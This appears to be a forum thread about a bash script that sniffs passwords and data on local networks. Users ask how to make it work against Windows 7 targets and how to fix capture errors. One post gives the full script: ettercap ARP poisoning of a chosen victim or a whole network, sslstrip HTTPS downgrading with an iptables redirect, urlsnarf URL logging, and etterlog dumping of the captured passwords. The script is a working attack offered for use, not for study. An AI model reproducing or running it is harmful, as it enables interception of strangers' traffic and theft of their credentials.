Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf

[kkrapul]

Great script, I tried with vmware on a Mac and it works like a charm on a XP, and another Mac, but when I do against a Windows 7 it just won't work, loading the pages takes forever..I assume it is because the Firewire on Windows 7, I have already turned off the firewall in the router...is there anything I can do against the Firewire on windows?...can Ettercap attack Windows 7?

thanks a lot!!!

[linuxbatter]

Why doesn't the script save the captured passwords to file? All I get is some output when I (q)uit .
And the extracting images is not working.

[nivong]

Thanks for this script, nice work!

But when I want to quite, using 'q' (without the' ' offcourse) it wont quite? How come?

[ryannathans]

noob question: is it true that you can ARP over WLAN instead of LAN?

[nivong]

noob question: is it true that you can ARP over WLAN instead of LAN?

yes you can

[ryannathans]

installed tcpxtract then ran the script.


getting errors on this line: "$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap

running script as root...

anyone else got this problem?

[nivong]

Yes tcpxtract isn't working out of the box, you need to mod some stuff

[ryannathans]

Yes tcpxtract isn't working out of the box, you need to mod some stuff

are you willing to help
?

[clarkkent]

Hi,

I have done what you told, and when I run script wireshark starts and run the program. But where can I find the log files and how can I analyze it ? For example i copied the script file to x folder and i finish with there is no new log file in the same folder ?

[jenbo]

#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci